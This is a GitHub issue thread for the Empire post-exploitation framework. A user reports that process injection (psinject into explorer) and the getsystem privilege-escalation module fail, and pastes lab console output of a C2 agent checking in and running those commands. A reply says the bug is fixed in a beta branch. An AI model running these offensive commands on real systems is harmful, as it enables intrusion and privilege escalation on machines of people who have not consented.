EmpireProject / Empire

Empire is a PowerShell and Python post-exploitation agent.
http://www.powershellempire.com/
BSD 3-Clause "New" or "Revised" License

Process injection(psinject not working) #1340

Open CptOfEvilMinions opened 5 years ago

CptOfEvilMinions commented 5 years ago

Empire Version

OS Information (Linux flavor, Python version)

Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Empire agent running as Administrator cannot inject into another process with psinject. Furthermore, if I try to obtain SYSTEM it fails as well.

Screenshot of error, embedded text output, or Pastebin link to the error

Process injection

(Empire: stager/multi/launcher) > [*] Sending POWERSHELL stager (stage 1) to 192.168.228.131
[*] New agent 5HA8W4T6 checked in
[+] Initial agent 5HA8W4T6 from 192.168.228.131 now active (Slack)
[*] Sending agent (stage 2) to 5HA8W4T6 at 192.168.228.131

(Empire: stager/multi/launcher) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 5HA8W4T6 ps 192.168.228.131 DESKTOP-P8PBRLM   *DESKTOP-P8PBRLM\Sherlo powershell         5768   5/0.0    2019-03-27 12:59:11

(Empire: agents) > interact 5HA8W4T6
(Empire: 5HA8W4T6) > psinject http80 explorer
[*] Tasked 5HA8W4T6 to run TASK_CMD_JOB
[*] Agent 5HA8W4T6 tasked with task ID 1
[*] Tasked agent 5HA8W4T6 to run module powershell/management/psinject
(Empire: 5HA8W4T6) > [*] Agent 5HA8W4T6 returned results.
Job started: H6F8Y4
[*] Valid results returned by 192.168.228.131
(Empire: 5HA8W4T6) > 

Get-System

(Empire: 5HA8W4T6) > usemodule privesc/getsystem*
(Empire: powershell/privesc/getsystem) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 5HA8W4T6 to run TASK_CMD_WAIT
[*] Agent 5HA8W4T6 tasked with task ID 2
[*] Tasked agent 5HA8W4T6 to run module powershell/privesc/getsystem
(Empire: powershell/privesc/getsystem) > [*] Agent 5HA8W4T6 returned results.
error running command: Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
[*] Valid results returned by 192.168.228.131

(Empire: powershell/privesc/getsystem) > 

Any additional information

Empire HTTP listener - no encryption
Defender is turned off on Windows

Started a PowerShell instance as Administrator to execute the Empire multi/launcher payload.

CptOfEvilMinions commented 5 years ago

Fixed in 3.0-Beta branch (883ee661d1bbc72920102054e8bba00515bff9e0)